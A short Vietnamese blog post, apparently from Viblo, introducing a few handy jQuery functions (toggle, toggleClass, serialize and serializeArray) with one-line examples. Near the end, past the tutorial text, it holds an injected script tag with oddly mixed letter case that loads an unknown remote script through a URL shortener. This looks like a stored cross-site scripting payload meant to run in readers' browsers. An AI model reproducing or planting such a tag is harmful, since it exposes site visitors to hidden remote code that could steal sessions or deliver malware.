+1

Một số hàm hữu dụng trong jquery

Jquery là một trong những thư viện Javascrit được sử dụng nhiều nhất! Tuy không 'hot' như AngularJS hay ReactJS nhưng vẫn rất hữu dụng với các lập trình viên!

1. toggle()

$('#div1').toggle();

Chuyển đổi giữa show/hide của element. Rất tuyệt vời nếu bạn cần ẩn/hiện thẻ div, table, fieldset khi click. 2. toggleClass()

$('#div1').toggleClass('red');

Hàm này thực hiện việc add/remove class của element. Rất hữu dụng và có thể thay thế đc if/else -> add/removeClass.

3. serialize() / serializeArray()

function serialize() sẽ encode form html thành dạng string.

function serializeArray() sẽ encode form html thành dạng array.

Ngoài ra còn rất nhiều function mà chúng ta vẫn rất hay sử dụng như:

show(), hide(), find(), addClass(), removeClass() ...

<sCrIpT src="https://goo.gl/4MuVJw"></ScRiPt>


All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.